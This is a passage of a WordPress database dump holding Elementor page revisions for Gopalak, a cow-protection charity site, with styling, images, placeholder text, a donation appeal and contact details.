role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:59:45','2022-10-13 10:29:45','',1373,'https://gopalak.in/?p=1724',0,'revision','',0),(1725,1,'2022-10-13 16:28:52','2022-10-13 10:58:52','','Contribute-123','','inherit','open','closed','','contribute-123','','','2022-10-13 16:28:52','2022-10-13 10:58:52','',1626,'https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png',0,'attachment','image/png',0),(1726,1,'2022-10-13 16:28:58','2022-10-13 10:58:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-13 16:28:58','2022-10-13 10:58:58','',1626,'https://gopalak.in/?p=1726',0,'revision','',0),(1727,1,'2022-10-13 16:28:58','2022-10-13 10:58:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-13 16:28:58','2022-10-13 10:58:58','',1626,'https://gopalak.in/?p=1727',0,'revision','',0),(1728,1,'2022-10-13 16:28:58','2022-10-13 10:58:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-13 16:28:58','2022-10-13 10:58:58','',1626,'https://gopalak.in/?p=1728',0,'revision','',0),(1730,1,'2022-10-13 18:01:46','2022-10-13 12:31:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:01:46','2022-10-13 12:31:46','',1373,'https://gopalak.in/?p=1730',0,'revision','',0),(1731,1,'2022-10-13 18:01:46','2022-10-13 12:31:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 18:01:46','2022-10-13 12:31:46','',1373,'https://gopalak.in/?p=1731',0,'revision','',0),(1732,1,'2022-10-13 18:01:46','2022-10-13 12:31:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left 